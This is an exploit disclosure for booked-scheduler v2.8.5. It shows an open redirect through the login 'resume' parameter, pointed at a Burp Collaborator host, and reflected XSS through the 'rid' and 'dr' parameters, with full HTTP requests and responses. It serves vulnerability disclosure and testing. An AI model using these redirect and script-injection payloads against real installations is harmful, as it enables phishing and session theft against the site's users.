## https://sploitus.com/exploit?id=PACKETSTORM:182369
# Exploit Title: Open Redirect / Reflected XSS - booked-scheduler v2.8.5  
# Date: 10/2024  
# Exploit Author: Andrey Stoykov  
# Version: 2.8.5  
# Tested on: Ubuntu 22.04  
# Blog:  
https://msecureltd.blogspot.com/2024/10/friday-fun-pentest-series-13-reflected.html  
https://msecureltd.blogspot.com/2024/10/friday-fun-pentest-series-12-open.html  
  
  
Open Redirect (the "resume" login parameter is copied unvalidated into the Location response header, as shown below):  
  
Steps to Reproduce:  
  
1. Log in and intercept the HTTP login request with a proxy such as Burp Suite or ZAP  
2. Set the "resume" parameter to the external redirect URL (e.g. a Burp Collaborator host)  
3. Forward the request  
  
index.php  
  
// HTTP POST login request  
  
POST /Bookedbo8effotfu/Web/index.php HTTP/1.1  
Host: localhost  
Cookie: PHPSESSID=7c0a0ee0b401863e1a30acbebf301916; language=en_gb;  
fus_session=a15fcb9ef40abd1dece4c7fc35c2b58c; fus_visited=yes  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0)  
Gecko/20100101 Firefox/132.0  
[...]  
  
email=admin&password=password&captcha=&login=submit&resume=  
https://urp4vilyopoly8dhq6xa2z8v0m6du3is.oastify.com&language=en_gbg  
  
  
// HTTP response  
  
HTTP/1.1 302 Found  
Date: Sat, 12 Oct 2024 12:09:33 GMT  
Server: Apache  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Location: https://urp4vilyopoly8dhq6xa2z8v0m6du3is.oastify.com  
Content-Length: 0  
Connection: close  
Content-Type: text/html; charset=UTF-8  
  
  
Reflected XSS (the "rid" and "dr" query parameters are echoed without HTML attribute encoding into the "Return to the last page" link, as shown below):  
  
reservation.php  
  
// HTTP GET request  
  
GET  
/Bookedbo8effotfu/Web/reservation.php?rid="><script>alert(document.domain)</script>  
HTTP/1.1  
Host: localhost  
Cookie: PHPSESSID=7c0a0ee0b401863e1a30acbebf301916; language=en_gb;  
new_version=v%3D2.8.5%2Cfs%3D1728734988;  
fus_session=a15fcb9ef40abd1dece4c7fc35c2b58c; fus_visited=yes  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0)  
Gecko/20100101 Firefox/132.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-GB,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Dnt: 1  
Sec-Gpc: 1  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
Priority: u=0, i  
Te: trailers  
Connection: keep-alive  
  
  
// HTTP response  
  
HTTP/1.1 200 OK  
Date: Sat, 12 Oct 2024 12:23:55 GMT  
Server: Apache  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Connection: close  
Content-Type: text/html; charset=UTF-8  
Content-Length: 14003  
  
<h5><a  
href="//localhost/Bookedbo8effotfu/Web/reservation.php?rid="><script>alert(document.domain)</script>">Return  
to the last page that you were on</a></h5>  
</div>  
  
  
schedule.php  
  
  
// HTTP GET request  
  
GET  
/Bookedldk0euwfjx/Web/schedule.php?dr="><script>alert(document.domain)</script>  
HTTP/1.1  
Host: localhost  
Cookie: PHPSESSID=c7aa15661bb6b0b72ab88132664b75c9; language=en_gb;  
resource_filter1=%7B%22ScheduleId%22%3A%221%22%2C%22ResourceIds%22%3A%5B%5D%2C%22ResourceTypeId%22%3Anull%2C%22MinCapacity%22%3Anull%2C%22ResourceAttributes%22%3A%5B%5D%2C%22ResourceTypeAttributes%22%3A%5B%5D%7D;  
schedule_calendar_toggle=false  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0)  
Gecko/20100101 Firefox/132.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-GB,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: none  
Sec-Fetch-User: ?1  
Priority: u=0, i  
Te: trailers  
Connection: keep-alive  
  
  
// HTTP response  
  
HTTP/1.1 200 OK  
Date: Sat, 19 Oct 2024 09:12:33 GMT  
Server: Apache  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Connection: close  
Content-Type: text/html; charset=UTF-8  
Content-Length: 7853  
  
<h5><a  
href="//localhost/Bookedldk0euwfjx/Web/schedule.php?dr="><script>alert(document.domain)</script>">Return  
to the last page that you were on